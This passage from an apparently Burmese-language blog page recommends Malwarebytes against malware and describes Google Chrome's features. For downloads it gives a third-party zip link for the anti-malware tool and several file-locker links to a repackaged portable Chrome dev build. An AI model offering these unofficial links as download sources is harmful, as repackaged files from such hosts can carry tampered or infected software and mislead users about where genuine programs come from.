ဘာမှမဖြစ်ပဲနဲ့ Antivirus run လိုက်မှ နောက်ဆုံး ရှိတဲ့ ဖိုင်လေးတွေပါ
အကုန်ပြောင်သွားတတ်ပါတယ်။) ဒါကြောင့် ၄င်း malware တွေက မိမိရဲ့ Running
System နဲ့ Applications တွေကို နည်းမျိုးစုံနဲ့ဒုက္ခပေး၊ application
သုံးနေရင်းနဲ့ ရုတ်တရက်ပိတ်၊ error ကျ အဲ့လိုတွေဖြစ်လာတတ်တယ်။ ဒီအတွက်
Maleware Bytes ဆိုတဲ့ software လေးက အဆင်ပြေဆုံးပါ။

http://www.planetcreator.net/downloads/4in1tool.zip




Google Chrome ဆိုတာက Google Company ကထုတ်လုပ်တဲ့ အသေးငယ်ငယ်ဆုံး နဲ့အပေါ့ပါးဆုံး အပြင်အဆင်နဲ့အတူ ဆန်းပြားတဲ့ နည်းပညာတွေနဲ့ တည်ဆောက်ထားတဲ့ Web Browser တစ်ခုပါ။ ၄င်းက ရှာဖွေမှုအပိုင်းမှာ မိမိလိုချင်တဲ့ စကားစုကို ရိုက်ထည့်လိုက်တာနဲ့ အလွယ်တကူ ကူညီမှုပေးပါတယ်.. ဒါကလည်း search engine တစ်ချို့မှာမပါဝင်တဲ့ feature ကိုပေးတာပါ။ နောက်တစ်ခုကတော့ မိမိ ကြည့်ရှုပြီးသား Website တွေကို အစီအစဉ်တကျ ဖန်တီးတည်းပြီး အစဉ်လိုက်ဖော်ပြပေးပါလိမ့်မယ်။ လုံခြုံမှုအပိုင်းမှာလည်း Internet User က ဖွင့်လိုက်တဲ့ website ဟာ SSL-Secured ဖြစ်နေမယ်ဆိုရင် ရွှေရောင် address bar လေးဖြစ်သွားးပါလိမ့်မယ်။ ပုံမှန်အတိုင်းဆိုရင်တော့ အစိမ်းရောင်လေးပေါ့.. ထို့အတူပဲ Security Information တွေမှာလည်း လုံခြုံရေးဆိုင်ရာတွေကို လေ့လာနိုင်ပါတယ်။

Downloads


http://depositfiles.com/files/7gc32raab
http://turbobit.net/d7wnmqrgthhx.html
http://extabit.com/file/28ds101qktg2p
http://sharingmatrix.com/file/1469945/Google_Chrome_5.0.317.2_Dev_Portable.rar
http://vip-file.com/download/4383.4802262d0935d290dcac3573a8/Google_Chrome_5.0.317.2_Dev_Portable.rar.html
http://hotfile.com/dl/27608768/c2924f9/Google_Chrome_5.0.317.2_Dev_Portable.rar.html

Latest Activity

added a new blog entry.
19 months ago
added a new blog entry.
19 months ago
added a new blog entry.
19 months ago
added a new blog entry.
19 months ago
added a new blog entry.
19 months ago

Share

Powered by